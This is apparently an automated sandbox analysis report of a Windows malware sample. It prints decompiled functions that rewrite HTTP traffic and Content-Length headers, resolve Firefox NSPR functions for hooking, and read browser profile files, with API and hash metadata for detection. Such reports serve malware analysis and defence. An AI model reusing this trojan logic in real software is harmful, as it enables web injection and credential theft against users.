							_t119 = E004055C6( &_v20,  *((intOrPtr*)(_t176 + 0x18)),  *((intOrPtr*)(_t176 + 0x14)), ( &_v48 & 0xffffff00 | _v52 == 0x00000000) & 0x000000ff,  &_v48,  &_v40);
							_v60 = _t119;
							if(_t119 == 1) {
								if(E00415547( *((intOrPtr*)(_t176 + 0x10)),  *((intOrPtr*)(_t176 + 0xc)),  *((intOrPtr*)(_t176 + 4)),  &_v48,  &_v40) != 0) {
									_t155 = _v40;
									_t186 = E0040C192( *((intOrPtr*)(_t176 + 0x18)) -  *((intOrPtr*)(_t199 + 0x3c)) +  *((intOrPtr*)(_t199 + 0x38)) + _t155 + 0x14);
									_v40 = _t186;
									if(_t186 != 0) {
										_t131 = E0040C1FE(_t186,  *((intOrPtr*)(_t176 + 0x14)),  *((intOrPtr*)(_t199 + 0x38)));
										_push(_t155);
										if(( *(_t199 + 0x30) & 0x00000002) == 0) {
											E0040C96B(_t199 + 0x28);
											_t188 = E00411165(_t186,  *((intOrPtr*)(_t199 + 0x40)), "Content-Length",  &_v36) + _v60;
											E0040C1FE(_t188,  *((intOrPtr*)(_t199 + 0x18)), _t155);
											_t189 = _t188 + _t155;
											__eflags = _t189;
										} else {
											_push("%x\r\n");
											_t191 = _t186 + _t131;
											_t177 = 0xd;
											_t192 = _t191 + E0040CEF9(_t131, _t177, _t191);
											E0040C1FE(_t192, _v48, _t155);
											_t193 = _t192 + _t155;
											E0040C1FE(_t193, "\r\n0\r\n\r\n", 7);
											_t176 = _v60;
											_t189 = _t193 + 7;
										}
										_t137 =  *((intOrPtr*)(_t176 + 0x18));
										if( *((intOrPtr*)(_t199 + 0x3c)) !=  *((intOrPtr*)(_t176 + 0x18))) {
											_t189 = _t189 + E0040C1FE(_t189,  *((intOrPtr*)(_t176 + 0x14)) +  *((intOrPtr*)(_t199 + 0x3c)), _t137 -  *((intOrPtr*)(_t199 + 0x3c)));
										}
										E0040C1C2( *((intOrPtr*)(_t176 + 0x14)));
										_t139 = _v44;
										 *((intOrPtr*)(_t176 + 0x14)) = _t139;
										 *((intOrPtr*)(_t176 + 0x18)) = _t189 - _t139;
									}
								}
								_v44 = _v44 | 0xffffffff;
								E0040C1C2(_v48);
							}
							_t153 = 0x4223c0;
						}
						if(_v52 <= 0) {
							L29:
							if(__eflags == 0) {
								L31:
								 *((intOrPtr*)(_t176 + 0x2c)) =  *((intOrPtr*)(_t176 + 0x14));
								 *((intOrPtr*)(_t176 + 0x30)) =  *((intOrPtr*)(_t176 + 0x18));
								 *((intOrPtr*)(_t176 + 0x34)) = 0;
								 *((intOrPtr*)(_t176 + 0x14)) = 0;
								 *((intOrPtr*)(_t176 + 0x18)) = 0;
								E00415A65( *((intOrPtr*)(_t176 + 0x10)),  *((intOrPtr*)(_t176 + 0xc)));
								_t103 = _v40;
								 *((intOrPtr*)(_t176 + 0x10)) = 0;
								 *((intOrPtr*)(_t176 + 0xc)) = 0;
								goto L32;
							}
							__eflags = _v44 - 0xffffffff;
							if(_v44 != 0xffffffff) {
								goto L37;
							}
							goto L31;
						} else {
							if(_v44 != 0) {
								__eflags = _v52;
								goto L29;
							}
							_push(0);
							_push(0xffffe892);
							goto L36;
						}
					}
					_t149 = _t108 * 0x38 +  *0x4223dc;
					_t156 =  *((intOrPtr*)(_t149 + 0x18)) + _t168;
					_t11 = _t149 + 0x14; // -4334536
					if(E0040C14D( *((intOrPtr*)(_t149 + 0x18)) + _t168, _t11) == 0) {
						goto L35;
					}
					_t168 = _v52;
					goto L11;
				}
			}

0x004057fe
0x00405804
0x00405809
0x0040580e
0x00405afb
0x00405b02
0x00000000
0x00405828
0x0040582e
0x00405834
0x00405836
0x0040583e
0x00405af4
0x00405af5
0x00000000
0x00405af5
0x00405847
0x00405851
0x00405a8d
0x00405a90
0x00405a93
0x00405a93
0x00405a96
0x00405a9b
0x00405aa7
0x00405aac
0x00405ab2
0x00405ab5
0x00405ac3
0x00405ac3
0x00405ac9
0x00405acf
0x00405b0b
0x00405b11
0x00405b11
0x0040585b
0x00000000
0x00000000
0x00405862
0x0040586f
0x00405875
0x00405878
0x0040587f
0x00405aee
0x00405aee
0x00000000
0x00405aee
0x00405886
0x00405888
0x0040588d
0x00405892
0x00405ad3
0x00405ad3
0x00405ad5
0x00405ada
0x00405ada
0x00405ae0
0x00405ae7
0x00405ae8
0x00000000
0x00405ae8
0x00405898
0x0040589e
0x004058c2
0x004058c5
0x004058cb
0x004058d1
0x004058de
0x004058e3
0x004058e3
0x004058f0
0x004058f5
0x004058fc
0x00405920
0x00405925
0x0040592c
0x0040594c
0x00405959
0x0040596a
0x0040596c
0x00405972
0x00405981
0x0040598b
0x0040598c
0x004059c8
0x004059e8
0x004059ed
0x004059f2
0x004059f2
0x0040598e
0x0040598e
0x00405995
0x00405997
0x004059a4
0x004059a7
0x004059b3
0x004059b6
0x004059bb
0x004059bf
0x004059bf
0x004059f4
0x004059fb
0x00405a10
0x00405a10
0x00405a15
0x00405a1a
0x00405a20
0x00405a23
0x00405a23
0x00405972
0x00405a2a
0x00405a2f
0x00405a2f
0x00405a34
0x00405a34
0x00405a3f
0x00405a56
0x00405a56
0x00405a63
0x00405a69
0x00405a6f
0x00405a75
0x00405a78
0x00405a7b
0x00405a7e
0x00405a83
0x00405a87
0x00405a8a
0x00000000
0x00405a8a
0x00405a58
0x00405a5d
0x00000000
0x00000000
0x00000000
0x00405a41
0x00405a45
0x00405a52
0x00000000
0x00405a52
0x00405a47
0x00405a48
0x00000000
0x00405a48
0x00405a3f
0x004058a3
0x004058ac
0x004058ae
0x004058b8
0x00000000
0x00000000
0x004058be
0x00000000
0x004058be

APIs

Part of subcall function 004132A1: WaitForSingleObject.KERNEL32(00000000,00407D52,00000310,00000000,00000310,909011A5,00000002), ref: 004132A9

EnterCriticalSection.KERNEL32(004223C0), ref: 00405834
LeaveCriticalSection.KERNEL32(004223C0), ref: 00405862
EnterCriticalSection.KERNEL32(004223C0), ref: 00405886
LeaveCriticalSection.KERNEL32(004223C0,00000000,?,00000000), ref: 00405AC9
LeaveCriticalSection.KERNEL32(004223C0), ref: 00405AE8

Part of subcall function 00411165: StrCmpNIA.SHLWAPI(00000000,?,?,00000000,?,-004223DC,?,00000000), ref: 004111BF

Part of subcall function 0040C1C2: HeapFree.KERNEL32(00000000,00000000,0040D9B9,00000000,?,?,?,00412A7F,00000000,00412F59), ref: 0040C1D5

LeaveCriticalSection.KERNEL32(004223C0), ref: 00405AF5

Strings

%x, xrefs: 0040598E
0, xrefs: 004059AE
Content-Length, xrefs: 004059D2

Memory Dump Source

Source File: 00000003.00000001.203739017.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000001.203794504.0000000000425000.00000040.00020000.sdmp Download File

Similarity

API ID: CriticalSection$Leave$Enter$FreeHeapObjectSingleWait
String ID: 0$%x$Content-Length
API String ID: 4067213518-3838797520
Opcode ID: 7dd0451eeeb07f0fce7595bca93f5f37d2354d49f55ddbda274f15df770f06a9
Instruction ID: 3961b2f38d926f43c6ec9f1214284615276e42e29bfe455c3f34afaa9866a838
Opcode Fuzzy Hash: 7dd0451eeeb07f0fce7595bca93f5f37d2354d49f55ddbda274f15df770f06a9
Instruction Fuzzy Hash: D0918E72500612AFCB10EF25C98195BBBB5FF84314F044B2AF850A72E2D778E955CF99

Uniqueness

Uniqueness Score: -1.00%

Function 00415547, Relevance: 12.6, APIs: 5, Strings: 2, Instructions: 367
timenetworkCOMMON

Download Yara Rule

C-Code - Quality: 96%

			E00415547(char __eax, void* __ecx, char* _a4, intOrPtr* _a8, signed int* _a12) {
				char _v540;
				char _v800;
				char _v804;
				char _v860;
				struct _SYSTEMTIME _v876;
				char _v900;
				signed int _v968;
				signed int _v980;
				intOrPtr _v984;
				intOrPtr _v988;
				char* _v992;
				char _v996;
				void* _v1008;
				struct _SYSTEMTIME _v1028;
				signed int _v1032;
				short _v1036;
				signed short* _v1040;
				signed int _v1044;
				intOrPtr* _v1048;
				signed int _v1052;
				signed int _v1056;
				signed int _v1060;
				signed int _v1064;
				char _v1068;
				intOrPtr _v1072;
				char _v1076;
				intOrPtr _v1080;
				intOrPtr _v1084;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr _t158;
				signed int _t159;
				intOrPtr _t160;
				signed int _t168;
				void* _t188;
				void* _t199;
				signed int _t211;
				signed int _t215;
				signed int _t218;
				signed char _t222;
				signed int _t224;
				void* _t227;
				void* _t228;
				signed int _t229;
				signed int _t230;
				signed int _t240;
				void* _t242;
				signed int _t250;
				intOrPtr* _t254;
				signed int _t255;
				intOrPtr _t258;
				short* _t261;
				void* _t280;
				intOrPtr* _t286;
				signed int _t291;
				long _t294;
				signed short* _t296;
				signed short* _t298;
				signed int _t301;
				intOrPtr* _t303;
				signed int _t307;
				void* _t309;

				_t309 = (_t307 & 0xfffffff8) - 0x424;
				_v1032 = _v1032 & 0x00000000;
				if(__eax == 0) {
					L52:
					asm("sbb eax, eax");
					return  ~0x00000000;
				} else {
					_t286 = __ecx + 0x10;
					_v1048 = _t286;
					_v1028.wDayOfWeek = __eax;
					do {
						_t258 =  *_t286;
						_t279 =  *(_t286 - 0x10) >> 0x0000000a & 0x00000008;
						_v1028.wHour = _t279;
						if(_t258 == 0) {
							_t254 = _a8;
							L6:
							_t259 =  *(_t286 + 4);
							_v1052 = _v1052 & 0x00000000;
							_v1064 = _v1064 & 0x00000000;
							_t158 =  *((intOrPtr*)(_t286 + 8)) + _t259;
							_v1028.wSecond = _t158;
							if(_t259 >= _t158) {
								L35:
								_t159 =  *(_t286 - 0x10);
								_t294 = 0;
								if((_t159 & 0x00000008) != 0 && _v1052 != 0) {
									if((_t159 & 0x00000200) == 0) {
										_t255 = E0040C402(_t159 | 0xffffffff, 0, _a4);
										__eflags = _t255;
										if(_t255 != 0) {
											_t188 = 9;
											E004128DB(_t188,  &_v996);
											_push(_v1052);
											E00409404(_t259, _t279, __eflags, 0xc9, _t255, 0,  &_v996, _t255);
											_t309 = _t309 + 0x18;
											E0040C1C2(_t255);
										}
									} else {
										_t280 = 0x3c;
										E0040C275( &_v996,  &_v996, 0, _t280);
										_v992 =  &_v800;
										_v1008 = _t280;
										_v988 = 0x103;
										if(InternetCrackUrlA(_a4, 0, 0,  &_v1008) == 1 && _v992 > 0) {
											GetSystemTime( &_v1028);
											_t306 =  &_v876;
											_t199 = 8;
											E004128DB(_t199,  &_v876);
											_push(_v1028.wDay & 0x0000ffff);
											_push(_v1028.wMonth & 0x0000ffff);
											_push((_v1028.wYear & 0x0000ffff) - 0x7d0);
											_push( &_v804);
											E0040CEB5( &_v876, 0x104,  &_v540, _t306);
											_t309 = _t309 + 0x14;
											E0040925A(_t259, 0x104, 2, 0,  &_v540, _v1068, _v1080);
											_t286 = _v1084;
										}
									}
									E0040C1C2(_v1052);
									_t294 = 0;
								}
								if( *((intOrPtr*)(_t286 - 4)) != _t294) {
									if(( *(_t286 - 0x10) & 0x00000010) == 0) {
										EnterCriticalSection(0x423e54);
										E0040C1C2( *0x423e6c);
										_t168 = E0040C620(E0040C1C2( *0x423e70) | 0xffffffff,  *((intOrPtr*)(_t286 - 0xc)));
										 *0x423e6c = _t168;
										__eflags = _t168 | 0xffffffff;
										 *0x423e70 = E0040C620(_t168 | 0xffffffff,  *((intOrPtr*)(_t286 - 4)));
										LeaveCriticalSection(0x423e54);
										goto L51;
									}
									E0041352A( &_v860, _t259, 1,  &_v996);
									if(E0040D467( &_v900,  *((intOrPtr*)(_t286 - 4)), E0040CCFF( *((intOrPtr*)(_t286 - 4)))) == 0) {
										goto L51;
									}
									_t261 =  &_v860;
									do {
										E0040C52A( *((intOrPtr*)(_t309 + _t294 + 0xb8)), _t261);
										_t294 = _t294 + 1;
										_t261 = _t261 + 4;
									} while (_t294 < 0x10);
									 *_t261 = 0;
									GetLocalTime( &_v876);
									E00410441(_t261,  &_v996,  &_v860, 3,  &_v876, 0x10);
								}
								goto L51;
							} else {
								goto L9;
								L13:
								_t279 =  *_t211 & 0x0000ffff;
								if(_t279 != 4) {
									_t259 = _t211 + 4;
									_t218 = E0041486D(_v1028.wHour, _t211 + 4, 0,  &_v1056, _t279 - 4,  *_t254 + _v1060,  *_a12 - _v1060);
									__eflags = _t218;
									if(_t218 == 0) {
										L33:
										if(_v1028.wYear < _v1028.wSecond) {
											_t259 = _v1028.wYear;
											L9:
											_t211 = ( *_t259 & 0x0000ffff) + _t259;
											_t296 = ( *_t211 & 0x0000ffff) + _t211;
											_v1028.wYear = _t296 + ( *_t296 & 0x0000ffff);
											_t279 =  *_t259 & 0x0000ffff;
											_v1036 = _t259;
											_v1044 = _t211;
											_v1040 = _t296;
											if(( *_t259 & 0x0000ffff) != 4) {
												goto L11;
											} else {
												_v1060 = _v1060 & 0x00000000;
												goto L13;
											}
										}
										_t286 = _v1048;
										goto L35;
									}
									__eflags =  *_v1036 - 4;
									_t298 = _v1040;
									if( *_v1036 != 4) {
										_t54 =  &_v1056;
										 *_t54 = _v1056 + _v1060;
										__eflags =  *_t54;
									} else {
										_v1060 = _v1056;
									}
									L22:
									_t259 = _v1056 - _v1060;
									_t222 =  *(_v1048 - 0x10);
									_t291 = ( *_t298 & 0x0000ffff) - 4;
									_v1044 = _t259;
									if((_t222 & 0x00000004) == 0) {
										__eflags = _t222 & 0x00000008;
										if((_t222 & 0x00000008) != 0) {
											_t224 = E0040C14D(_t259 + _t291 + _v1064 + 2,  &_v1052);
											__eflags = _t224;
											if(_t224 != 0) {
												_t301 = _v1052;
												__eflags = _t291;
												if(_t291 != 0) {
													E0040C1FE(_v1064 + _t301,  &(_v1040[2]), _t291);
													_t84 =  &_v1076;
													 *_t84 = _v1076 + _t291;
													__eflags =  *_t84;
												}
												_t279 = _v1044;
												_t227 = E0040C1FE(_v1064 + _t301,  *_t254 + _v1060, _t279);
												_t259 = _v1060;
												__eflags =  *(_t259 - 0x10) & 0x00000100;
												if(( *(_t259 - 0x10) & 0x00000100) == 0) {
													_t228 = E00410DE8(_t227, _t279);
													_t95 =  &_v1068;
													 *_t95 = _v1068 + _t228;
													__eflags =  *_t95;
													_t254 = _a8;
												} else {
													_v1064 = _v1064 + _t279;
												}
												_t229 = _v1064;
												 *((char*)(_t229 + _t301)) = 0xa;
												_t230 = _t229 + 1;
												__eflags = _t230;
												_v1064 = _t230;
												 *((char*)(_t230 + _t301)) = 0;
											}
										}
									} else {
										_v1036 =  *_a12 - _t259 + _t291;
										_t240 = E0040C192( *_a12 - _t259 + _t291);
										_v1044 = _t240;
										if(_t240 != 0) {
											_t279 = _v1060;
											_t242 = E0040C1FE(E0040C1FE(_t240,  *_t254, _v1060) + _v1060,  &(_t298[2]), _t291);
											_t303 = _a12;
											_t259 =  *_t254 + _v1080;
											E0040C1FE(_t242 + _t291 + _v1060,  *_t254 + _v1080,  *_t303 - _v1080);
											E0040C1C2( *_t254);
											_v1072 = _v1072 + 1;
											 *_t254 = _v1084;
											 *_t303 = _v1076;
										}
									}
									goto L33;
								}
								if( *_t259 != _t279) {
									_t250 = _v1060;
								} else {
									_t250 =  *_a12;
								}
								_v1056 = _t250;
								goto L22;
								L11:
								_t215 = E0041486D(_v1028.wHour, _t259,  &_v1060, 0, _t279 - 4,  *_t254,  *_a12);
								__eflags = _t215;
								if(_t215 == 0) {
									goto L33;
								}
								_t298 = _v1040;
								_t211 = _v1044;
								_t259 = _v1036;
								goto L13;
							}
						}
						_v996 = 0x2a3f;
						_v992 = _t258;
						_t160 = E0040CCFF(_t258);
						_t254 = _a8;
						_v988 = _t160;
						_v984 =  *_t254;
						_t279 = _t279 | 0x00000012;
						_v980 =  *_a12;
						_v968 = _t279;
						if(E0040D146( &_v996) != 0) {
							goto L6;
						}
						L51:
						_t286 = _t286 + 0x1c;
						_t150 =  &(_v1028.wDayOfWeek);
						 *_t150 = _v1028.wDayOfWeek - 1;
						_v1048 = _t286;
					} while ( *_t150 != 0);
					goto L52;
				}
			}

0x0041554d
0x00415553
0x0041555d
0x004159e8
0x004159ef
0x004159f8
0x00415563
0x00415563
0x00415566
0x0041556a
0x0041556e
0x00415571
0x00415576
0x00415579
0x0041557f
0x004155c1
0x004155c4
0x004155c4
0x004155ca
0x004155cf
0x004155d4
0x004155d6
0x004155dc
0x004157de
0x004157de
0x004157e1
0x004157e5
0x004157fa
0x004158bf
0x004158c1
0x004158c3
0x004158cb
0x004158cc
0x004158d1
0x004158e1
0x004158e6
0x004158ea
0x004158ea
0x00415800
0x00415802
0x0041580a
0x00415816
0x00415824
0x00415828
0x00415839
0x0041584e
0x00415856
0x0041585d
0x0041585e
0x00415868
0x0041586e
0x00415879
0x00415881
0x00415891
0x00415896
0x004158a8
0x004158ad
0x004158ad
0x00415839
0x004158f3
0x004158f8
0x004158f8
0x004158fd
0x00415907
0x00415994
0x004159a0
0x004159b6
0x004159bb
0x004159c3
0x004159cc
0x004159d1
0x00000000
0x004159d1
0x0041591b
0x00415939
0x00000000
0x00000000
0x0041593f
0x00415946
0x0041594d
0x00415952
0x00415953
0x00415956
0x0041595d
0x00415968
0x00415987
0x00415987
0x00000000
0x004155e2
0x004155e2
0x00415647
0x00415647
0x0041564d
0x00415680
0x00415687
0x0041568c
0x0041568e
0x004157cc
0x004157d4
0x004155e4
0x004155e8
0x004155eb
0x004155f0
0x004155f7
0x004155fb
0x004155fe
0x00415602
0x00415606
0x0041560d
0x00000000
0x0041560f
0x0041560f
0x00000000
0x0041560f
0x0041560d
0x004157da
0x00000000
0x004157da
0x00415698
0x0041569c
0x004156a0
0x004156b0
0x004156b0
0x004156b0
0x004156a2
0x004156a6
0x004156a6
0x004156b4
0x004156bf
0x004156c3
0x004156c6
0x004156c9
0x004156cf
0x00415741
0x00415743
0x00415757
0x0041575c
0x0041575e
0x00415760
0x00415764
0x00415766
0x00415778
0x0041577d
0x0041577d
0x0041577d
0x0041577d
0x00415783
0x00415794
0x00415799
0x0041579d
0x004157a4
0x004157af
0x004157b4
0x004157b4
0x004157b4
0x004157b8
0x004157a6
0x004157a6
0x004157a6
0x004157bb
0x004157bf
0x004157c3
0x004157c3
0x004157c4
0x004157c8
0x004157c8
0x0041575e
0x004156d1
0x004156da
0x004156de
0x004156e3
0x004156e9
0x004156ef
0x00415705
0x0041570a
0x00415718
0x00415720
0x00415727
0x00415730
0x00415734
0x0041573a
0x0041573a
0x004156e9
0x00000000
0x004156cf
0x00415652
0x0041565b
0x00415654
0x00415657
0x00415657
0x0041565f
0x00000000
0x00415616
0x0041562e
0x00415633
0x00415635
0x00000000
0x00000000
0x0041563b
0x0041563f
0x00415643
0x00000000
0x00415643
0x004155dc
0x00415581
0x00415588
0x0041558c
0x00415591
0x00415594
0x0041559a
0x004155a3
0x004155aa
0x004155ae
0x004155b9
0x00000000
0x004155bf
0x004159d7
0x004159d7
0x004159da
0x004159da
0x004159de
0x004159de
0x00000000
0x0041556e

APIs

InternetCrackUrlA.WININET(?,00000000,00000000,?), ref: 00415830
GetSystemTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,?), ref: 0041584E
GetLocalTime.KERNEL32(?,?,?,00000000,00000001,?,-004223DC,?,?), ref: 00415968
EnterCriticalSection.KERNEL32(00423E54,-004223DC,?,?), ref: 00415994
LeaveCriticalSection.KERNEL32(00423E54,?,?), ref: 004159D1

Strings

T>B, xrefs: 0041598E
?*, xrefs: 00415581

Memory Dump Source

Source File: 00000003.00000001.203739017.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000001.203794504.0000000000425000.00000040.00020000.sdmp Download File

Similarity

API ID: CriticalSectionTime$CrackEnterInternetLeaveLocalSystem
String ID: ?*$T>B
API String ID: 2400141425-1382917818
Opcode ID: 83612b068a0c9c4e0531e6a334d26399caa60318d195f706395092e216cafbbb
Instruction ID: 9b8ad2ce2d8163684a3bcd8b8ed98e0d6d7ec95a0aa6e8ea9889ce0cd8e05bf2
Opcode Fuzzy Hash: 83612b068a0c9c4e0531e6a334d26399caa60318d195f706395092e216cafbbb
Instruction Fuzzy Hash: F8E159B1608341DFD710DF69C880AABB7E5FF88714F004A2EF895A7291D738E945CB5A

Uniqueness

Uniqueness Score: -1.00%

Function 00418D21, Relevance: 12.4, APIs: 4, Strings: 3, Instructions: 156
COMMON

Download Yara Rule

C-Code - Quality: 79%

			E00418D21(char* __ecx, char* __edx, void* __eflags) {
				intOrPtr _v8;
				char _v12;
				intOrPtr _v16;
				char* _v20;
				char _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				char _v64;
				char _v84;
				char _v108;
				char _v152;
				char _v180;
				char _v252;
				short _v766;
				char _v772;
				short _v1292;
				void* __edi;
				void* __esi;
				void* _t46;
				void* _t48;
				void* _t53;
				void* _t57;
				void* _t59;
				void* _t61;
				void* _t68;
				void* _t70;
				void* _t75;
				WCHAR* _t100;
				signed int _t101;
				WCHAR* _t103;
				char* _t108;
				intOrPtr _t109;
				void* _t112;
				intOrPtr _t125;

				_t99 = __edx;
				_t98 = __ecx;
				E0040C275( &_v12,  &_v12, 0, 8);
				_t46 = 0x6a;
				E004128DB(_t46,  &_v252);
				_t48 = 0x6b;
				E004128DB(_t48,  &_v108);
				_t100 =  &_v772;
				_t53 = E004102E6(0x80000001, _t98, _t100,  &_v252,  &_v108, 0x104);
				if(_t53 != 0xffffffff) {
					_t115 = _t53;
					if(_t53 != 0) {
						ExpandEnvironmentStringsW(_t100,  &_v1292, 0x104);
						E00418B35(_t99, _t115,  &_v1292,  &_v12);
						PathRemoveFileSpecW( &_v1292);
					}
				}
				_t101 = 0;
				if(_v8 != 0) {
					L14:
					_t125 = _v8;
					goto L15;
				} else {
					_t57 = 0x6d;
					E004128DB(_t57,  &_v64);
					_t59 = 0x6e;
					E004128DB(_t59,  &_v152);
					_t108 =  &_v84;
					_t61 = 0x6f;
					E004128DB(_t61, _t108);
					_v24 =  &_v64;
					_v20 =  &_v152;
					_v40 = 0x24;
					_v36 = 0x1a;
					_v32 = 0x26;
					_v28 = 0x23;
					_v16 = _t108;
					do {
						_t109 =  *((intOrPtr*)(_t112 + _t101 * 4 - 0x24));
						__imp__SHGetFolderPathW(0, _t109, 0, 0,  &_v772);
						if(0 == 0) {
							_t118 = _t109 - 0x24;
							if(_t109 == 0x24) {
								E00418AF3(_t118,  &_v772,  &_v12, 0);
								_v766 = 0;
							}
							_t99 =  &_v24;
							_t98 =  &_v772;
							E004118EB( &_v772,  &_v24, 0, 3, 2, E00418CD8,  &_v12, 0, 0, 0);
						}
						_t101 = _t101 + 1;
					} while (_t101 < 4);
					if(_v8 != 0) {
						L15:
						if(_t125 <= 0) {
							return E0040C1C2(_v12);
						}
						_push(0xcb);
						return E00417504(_t99, _v12, 0x70);
					}
					_t68 = 0x6a;
					E004128DB(_t68,  &_v180);
					_t70 = 0x6c;
					E004128DB(_t70,  &_v64);
					_t103 =  &_v772;
					_t75 = E004102E6(0x80000001, _t98, _t103,  &_v180,  &_v64, 0x104);
					if(_t75 != 0xffffffff) {
						_t124 = _t75;
						if(_t75 != 0) {
							ExpandEnvironmentStringsW(_t103,  &_v1292, 0x104);
							E00418AF3(_t124,  &_v1292,  &_v12, 1);
						}
					}
					goto L14;
				}
			}

0x00418d21
0x00418d21
0x00418d35
0x00418d42
0x00418d43
0x00418d4d
0x00418d4e
0x00418d63
0x00418d6e
0x00418d76
0x00418d78
0x00418d7a
0x00418d87
0x00418d98
0x00418da4
0x00418da4
0x00418d7a
0x00418daa
0x00418daf
0x00418ecf
0x00418ecf
0x00000000
0x00418db5
0x00418dba
0x00418dbb
0x00418dc8
0x00418dc9
0x00418dd0
0x00418dd3
0x00418dd4
0x00418ddc
0x00418de5
0x00418dea
0x00418df1
0x00418df8
0x00418dff
0x00418e06
0x00418e09
0x00418e09
0x00418e1a
0x00418e22
0x00418e24
0x00418e27
0x00418e35
0x00418e3c
0x00418e3c
0x00418e55
0x00418e58
0x00418e5e
0x00418e5e
0x00418e63
0x00418e64
0x00418e6d
0x00418ed3
0x00418ed3
0x00000000
0x00418eea
0x00418ed8
0x00000000
0x00418ee0
0x00418e77
0x00418e78
0x00418e82
0x00418e83
0x00418e93
0x00418e9e
0x00418ea6
0x00418ea8
0x00418eaa
0x00418eb7
0x00418eca
0x00418eca
0x00418eaa
0x00000000
0x00418ea6

APIs

Part of subcall function 004102E6: RegOpenKeyExW.ADVAPI32(80000002,?,00000000,00000001,00000000,00000104,00000000,?,?,004174C9,?,?,00000104,.exe,00000000), ref: 004102FB

ExpandEnvironmentStringsW.KERNEL32(?,?,00000104,?,?,00000104,?,00000000,00000008,?,00000000,00000001), ref: 00418D87

Part of subcall function 00418B35: GetPrivateProfileStringW.KERNEL32 ref: 00418B6C
Part of subcall function 00418B35: StrStrIW.SHLWAPI(00000001,?), ref: 00418BF4
Part of subcall function 00418B35: StrStrIW.SHLWAPI(00000001,?), ref: 00418C05
Part of subcall function 00418B35: GetPrivateProfileStringW.KERNEL32 ref: 00418C21
Part of subcall function 00418B35: GetPrivateProfileStringW.KERNEL32 ref: 00418C3F

PathRemoveFileSpecW.SHLWAPI(?,?,?,?,00000000,00000001), ref: 00418DA4

Part of subcall function 0040C1C2: HeapFree.KERNEL32(00000000,00000000,0040D9B9,00000000,?,?,?,00412A7F,00000000,00412F59), ref: 0040C1D5

SHGetFolderPathW.SHELL32(00000000,00000024,00000000,00000000,?,?,?,00000104,?,00000000,00000008,?,00000000,00000001), ref: 00418E1A
ExpandEnvironmentStringsW.KERNEL32(?,?,00000104,?,?,00000104,?,00000000,00000001), ref: 00418EB7

Strings

&, xrefs: 00418DF8
#, xrefs: 00418DFF
$, xrefs: 00418DEA

Memory Dump Source

Source File: 00000003.00000001.203739017.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000001.203794504.0000000000425000.00000040.00020000.sdmp Download File

Similarity

API ID: PrivateProfileString$EnvironmentExpandPathStrings$FileFolderFreeHeapOpenRemoveSpec
String ID: #$$$&
API String ID: 1517737059-1941049543
Opcode ID: c43fe9b534ac452456a11d9334d8008af798d9465eae7aa871ca7e8b56d6a304
Instruction ID: 6f858a0643c4319d6234ce880b71a16506ca758c971b088da8b77b7cdd7cc3c8
Opcode Fuzzy Hash: c43fe9b534ac452456a11d9334d8008af798d9465eae7aa871ca7e8b56d6a304
Instruction Fuzzy Hash: F9515072E00218AADF10EBA1CC49FDF77BCAB08314F0005ABB508F7181EB789AC58B55

Uniqueness

Uniqueness Score: -1.00%

Function 00405009, Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 30
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00405009(struct HINSTANCE__* __eax, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
				_Unknown_base(*)()* _t12;
				struct HINSTANCE__* _t14;

				 *0x4223dc =  *0x4223dc & 0x00000000;
				 *0x4223e0 =  *0x4223e0 & 0x00000000;
				_t14 = __eax;
				InitializeCriticalSection(0x4223c0);
				 *0x4223d8 = _a4;
				 *0x4223b4 = _a8;
				 *0x4223e4 = _a12;
				 *0x4223b8 = _t14;
				 *0x4223b0 = _a16;
				 *0x4223ac = GetProcAddress(_t14, "PR_GetNameForIdentity");
				 *0x4223bc = GetProcAddress( *0x4223b8, "PR_SetError");
				_t12 = GetProcAddress( *0x4223b8, "PR_GetError");
				 *0x4223a8 = _t12;
				return _t12;
			}

0x00405009
0x00405010
0x0040501d
0x0040501f
0x00405029
0x00405032
0x00405040
0x00405049
0x00405056
0x00405068
0x0040507a
0x0040507f
0x00405081
0x00405087

APIs

InitializeCriticalSection.KERNEL32(004223C0,0001FEBC,0041D6E0,00422348), ref: 0040501F
GetProcAddress.KERNEL32(00000000,PR_GetNameForIdentity), ref: 0040505B
GetProcAddress.KERNEL32(PR_SetError), ref: 0040506D
GetProcAddress.KERNEL32(PR_GetError), ref: 0040507F

Strings

PR_GetNameForIdentity, xrefs: 0040503B
PR_SetError, xrefs: 0040505D
PR_GetError, xrefs: 0040506F

Memory Dump Source

Source File: 00000003.00000001.203739017.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000001.203794504.0000000000425000.00000040.00020000.sdmp Download File

Similarity

API ID: AddressProc$CriticalInitializeSection
String ID: PR_GetError$PR_GetNameForIdentity$PR_SetError
API String ID: 2804437462-2578621715
Opcode ID: 86f6732d1267a67c644fb676fb2f042d0951ec7e20fc3586121d7b5137191a07
Instruction ID: f3dcad840434ac70956c5be4f0b71213a111c991e6a7b1c34c312d4cdba5c580
Opcode Fuzzy Hash: 86f6732d1267a67c644fb676fb2f042d0951ec7e20fc3586121d7b5137191a07
Instruction Fuzzy Hash: 30019DB4A04310BFC760CF35EE48B063FE0EB18761B94483AAC04A3264D3B89446CF88

Uniqueness

Uniqueness Score: -1.00%

Function 0041AB58, Relevance: 12.2, APIs: 8, Instructions: 180
threadsynchronizationCOMMON

Download Yara Rule

C-Code - Quality: 77%

			E0041AB58(void* __edx, intOrPtr* _a4) {
				char _v524;
				char _v544;
				char _v556;
				intOrPtr _v572;
				char _v924;
				char _v1028;
				char _v1040;
				char _v1060;
				intOrPtr _v1104;
				intOrPtr _v1108;
				intOrPtr _v1112;
				intOrPtr _v1116;
				char _v1120;
				char* _v1124;
				intOrPtr _v1128;
				char _v1132;
				intOrPtr _v1144;
				signed short _v1146;
				char _v1148;
				signed int _v1152;
				signed int _v1156;
				char _v1157;
				signed int _v1160;
				void* _v1164;
				void* _v1168;
				char _v1177;
				char _v1180;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t59;
				void* _t62;
